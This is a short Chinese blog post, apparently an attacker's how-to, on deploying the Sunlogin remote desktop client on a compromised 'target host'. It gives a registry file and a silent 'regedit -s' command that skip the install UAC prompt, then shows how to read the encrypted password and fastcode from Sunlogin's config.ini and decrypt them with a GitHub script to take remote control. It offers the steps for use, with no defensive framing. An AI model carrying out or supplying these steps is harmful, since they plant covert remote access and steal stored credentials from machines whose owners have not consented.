向日葵远程桌面工具使用

安装向日葵

安装时会有一个UAC的弹窗,所以需要绕过UAC,在安装向日葵时有一个以绿色版运行的选项,选择后在注册表中会创建一个键值,之后再运行的时候就可以直接进入软件,不需要进行安装。

UAC绕过

创建一个注册表文件 1.reg,内容如下:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Oray\SunLogin\SunloginClient]
"11.0.0.33826_IsRunSeted"="1"

将其上传至目标主机,注册并运行向日葵:

regedit ‐s 1.reg  # 注册注册表
SunloginClient.exe  # 运行向日葵

此时就可以正常使用向日葵了。

获取控制密钥

查看向日葵的配置文件,一般路径在:C:\ProgramData\Oray\SunloginClient\config.ini,打开找到 encry_pwdfastcode 的值即可:

image-20250513091039155

识别码是明文,但密钥需要解密,不能直接使用

密钥解密

使用在GitHub发布的脚本:脚本文件下载,运行解密即可:

python SunDecrypt.py

image-20250513091221569

posted @ 2025-12-04 16:24  shinianyunyan  阅读(3)  评论(0)    收藏  举报